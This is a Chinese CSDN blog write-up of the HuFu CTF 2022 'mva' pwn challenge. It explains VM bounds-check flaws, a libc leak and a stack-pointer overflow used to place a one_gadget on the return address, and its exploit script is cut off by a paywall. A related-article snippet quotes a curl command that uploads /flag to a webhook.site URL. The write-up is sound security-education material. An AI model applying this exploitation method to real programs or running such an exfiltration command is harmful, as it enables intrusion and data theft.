虎符CTF 2022 mva

最新推荐文章于 2024-03-09 22:43:41 发布
最新推荐文章于 2024-03-09 22:43:41 发布
阅读量1k 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/123626227
版权
本文详细介绍了在虎符CTF 2022比赛中,一道涉及虚拟机漏洞利用的题目。通过逆向分析,作者发现了程序中的边界检查问题,包括未检测的SBYTE1读取和不严格的栈指针检查。利用这些漏洞,可以读取libc地址,修正为onegadget,并修改sp指针,最终将onegadget写入返回地址,成功利用。
摘要由CSDN通过智能技术生成

前言:

昨天刚结束的虎符CTF的一道题,开始的太晚了,比赛结束半个小时才做出来,略显可惜

逆向分析:

在这里插入图片描述
拿到程序,稍做处理后可以看到,首先是让我们输入一段0x100的字节,然后开始取指-执行-取指-执行的过程,实现了一个小型的计算系统

然后我们简单的进行一些重命名,识别出一些结构来:
如push和pop:
在这里插入图片描述
设置寄存器的值
在这里插入图片描述
以及一些加减乘除和寄存器赋值等操作就不一一放截图了

漏洞

我们熟知VM的题漏洞基本都是边界检测的问题,sp的检测啊,寄存器指针的检测啊等等,本题也不例外

首先发现的是这两个地方:
在这里插入图片描述
case 0xD 功能中没有对SBYTE1进行任何检测,而v7又在栈上,所以可以进行一个栈上0x100范围内的任意地址读双字节,所以首先我们可以利用这个漏洞将栈上的一个libc中的地址读到寄存器中,一共有五个寄存器,在这一步用掉三个

将libc上地址写到寄存器里之后,再利用寄存器的加减法功能将其修正为onegadget

然后是case 0xE 功能中对SBYTE1没有进行负检测,导致可以利用这个漏洞修改reg到reg-0x100范围内的数据,到这里,我们再来看看栈结构是什么
在这里插入图片描述
可以发现,reg上面是sp指针,所以我们可以直接修改sp指针。接下来再来看它的栈检测做的是否完美:
在这里插入图片描述

这是push指令,可以看到它并没有对sp指针进行负检测,虽然在pop指令中有负检测,但是当我们可以直接修改sp指针的时候,这些检测就不够严格了。通过前面的漏洞修改sp为0x8000010c,这里注意,stack是一个双字节数组,可以看一下汇编代码:在这里插入图片描述

这里有一个rax2,所以说当我们sp为0x8000010c的时候,可以通过sp不能大于0x100的检测,而在真正赋值的时候,0x8000010c2又会发生溢出,最后变成0x218,而stack+0x218正是程序的返回地址,所以当我们修改好sp指针后,直接将三个寄存器中存储的六个字节数据按照顺序执行push,就将onegadget写到了返回地址上。

exp:

from pwn import *
from ctypes import *
from base64 import *
#context.log_level = 'debug'
context.arch='amd64'
#io = process('./pwn')
io = remote('119.23.155.14',24018)
libc = ELF('./libc-2.31.so')
elf=ELF('./pwn')
#io = process(["./pwn"],env={"LD_PRELOAD":"./libc-2.27.so"})
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn
最低0.47元/天 解锁文章
Ayakaaaa
关注
专栏目录
虎符2020CTF web easylogin.pdf
04-20
从提供的文件内容来看,这篇文档主要讨论了虎符2020CTF (Capture The Flag) 比赛中Web类题目“easylogin”的解题过程。CTF比赛是一种信息安全竞赛,参赛者需要通过解决各种信息安全挑战来获得相应的flag,即密码或...
2021虎符CTF第一道misc-writeup
慢就是快
04-06 811
文章目录1.题目概况2.思路3.提取数据得出结果 1.题目概况 经过简单分析,发现攻击者使用了延时注入的攻击手法,那么我们需要判断哪些语句成功执行了 2.思路 延时语句sleep(2),说明延时2秒,那么延时成功一个是发包间隔会相差两秒,而一个是成功和失败的返回界面不一致,那么响应包长度也不一致。如下图 3.提取数据得出结果 满足条件的语句提取后,把十进制转换成字符就好了,转换出来后是 ZmxhZ3tZb3VfYXJlX3NvX2dyZWF0fQ== 尝试base64解码, flag{You_are
2022虎符网络安全CTF部分wp(1)
没事我溜达
03-21 4036
Misc | Plain Text 进行base64解码 解码后尝试放到翻译软件 翻译软件判断为波兰语,但是翻译出来的语句不通顺,且有几个单词没翻译。所以判断是为其他语言编码。经过几次尝试,判断是俄语编码,找到俄语的编码方式 用linux可编译 (这题有点坑,这个苹果西瓜一直连不起来,后面才看到_) HFCTF{apple_watermelon} Misc | Quest-Crash 正在上传…重新上传取消进到页面 Get方式尝试了下没什么作用,就试了一下SET请求。然后请求了几
[LineCTF2022]BB
Sk1y的博客
06-18 1554
八进制,RCE,利用环境变量进行注入
虎符CTF-2022 mva 题解
CoLin的pwn小屋
04-03 3081
虎符CTF-2022 mva 题解
2022虎符 mva
sky123博客
03-24 4279
程序分析 main 函数 经典虚拟机 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int16 f; // [rsp+1Ah] [rbp-246h] __int16 is_run; // [rsp+1Ch] [rbp-244h] unsigned __int16 t; // [rsp+20h] [rbp-240h] unsigned int op; // [rsp+24h] [rbp-23Ch] int nex
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static.zip
最新发布
04-22
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static
虎符科技网络安全通信服务三种解决方案推选PPT文档.ppt
10-27
虎符科技的网络安全通信服务主要针对当前网络环境中存在的诸多问题,如钓鱼网站、骚扰电话和垃圾邮件等,这些问题的根源在于网络身份识别的缺失和传统安全措施的滞后。虎符科技提供的解决方案是基于自主创新的标识...
新锐 _ 虎符网络王伟alert7:人总是要挑战下自己的.pdf
09-18
王伟,作为虎符网络的创始人,提出了“零信任安全”理念,为解决当前信息安全面临的问题提供了全新的思路。 首先,我们来解释一下“零信任安全”。这是一个与传统网络安全理念相对的概念,其核心原则是“永不信任,...
高中历史之图说历史秦杜虎符:中华现存最早调兵凭证素材
09-09
1. 调兵凭证:秦杜虎符是中华历史上最早的调兵凭证,代表了战国时期秦朝的一种军事指挥系统。这种凭证用于验证君王命令的真实性,确保军事行动的合法性。 2. 错金工艺:秦杜虎符采用精美的错金工艺,这是一种古老的...
虎符CTF--MISC--奇怪的组织
a965527596的博客
04-21 2370
奇怪的组织 1.拿到文件发现是c盘文件,然后发现用phpstudy建了一个dede的站,发现了3个博客和一段密文,但是没有解密的信息。 先试试了base64,结果不对,然后猜测是AES加密,解密需要key,继续从文件中找。 2.官方提示看浏览行为和聊天信息,于是利用places.sqlite文件还原火狐的历史记录,发现bob先是建了dede的站,然后访问了一个emoji的解密网站。...
ctfer的日常web:[LineCTF2022]BB(buuctf
Hunter1_1的博客
03-09 471
向指定的 webhook 站点[]发送一个 POST 请求,并上传了一个名为 flag 的文件。 b"curl https://webhook.site/a27433a-afdb-9d9a080beb55 -F flag=@/flag" 这个命令的具体含义如下: curl: 是一个命令行工具,用于在终端中传输数据,支持多种协议。 https://webhook.site/a278d631-e3e5-433a-afdb-9d9a080beb55: 这是一个 webhook 站点的 URL,其中包含。。。。。。
虎符CTF2022 —shellcode
qq_54894802的博客
09-21 339
我们进行动态调试,先准备手动脱壳的,脱的时候发现居然有反调试,准备动态调试将反调试的patch但是发现很难脱,脱了半天还在循环,可能太菜的原因(T _ T)。或者记下这个地址,我们使用IDA的附加调试,将IDA附加到程序上,因为程序运行到了打印字符 了,所以壳肯定是解开了。将程序放入X32DBGz中进行分析,我们按F9运行几次,我们就可以运行到我们的OPE之中了。进入之后,我们进行简单的分析可以发现,这个函数实现的是base64加密。看分析还是比较简单,就是将原本程序里面的两端提示,进行加密的。
Java安全(十四) CTF-Java题目复现
WDWAGAAFGAGDADSA的博客
05-04 2500
最近复现学习的java题目
虎符CTF2020 部分题目复现(连续更新)
qq_41252520的博客
04-22 1746
PWN 0x0 MarksMan 【保护】: 【代码】: 很明显程序一开始就向我们泄露了libc的内存,如果通过检测,就可以任意地址写3个字节。如果能找到一处可控的调用,直接修改程one_gadget就可以了。 看看这个check检查了什么 这是过滤了部分字节,默认的one_gadget只能查看很少的可用地址,需要加上 -l参数,并指定一个较小的数字,如2,这样就能够得到更多可用地址。 现...
虎符-ctf crypto writeup
zhang14916的博客
04-23 1853
1.GM 由于题目中描述了这时一个GM密码系统,所以我们在网上查到FM密码系统破解方式https://blog.csdn.net/qq_26816591/article/details/82957481 首先根据n,phin建立一元二次方程求解n的因子p,q,再带入到解密公式中求解 import gmpy2 phi=943345166174941322591941459524332131...
虎符ctf web easy_login
weixin_43896279的博客
04-20 2117
虎符ctf web复现easy_login 我们可以先找到这样一个页面 我们可以看到这里明显提示 路径配置有问题 所以这里尝试读取一下app.js 这里我们分析一下逻辑,注册不能注册成admin, 但只有登录后session 中username为admin才可得到flag 所以这里我们伪造登录token 我们先注册一个账户发现会返回一个token 然后登录时token会作为验证 token为...
enc 虎符CTF
re1wn
05-04 3868
enc 虎符ctf
虎符网络安全赛道CTF MISC 奇怪的组织
蜜饯大王的博客
04-21 694
题目如下 下载附件解压,根据提示找到User下的bob用户,查看AppData下的Roaming 发现一个浏览器的文件和一个聊天软件的文件 然后自己下载安装Firefox和Thunderbird,然后先启动一下这两个软件,接着就在自己的电脑找到如下文件 把下载的附件中的Firefox的如下文件覆盖到自己电脑的对应位置 接着修改配置文件profiles.ini指定复制过来的文件 Thund...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值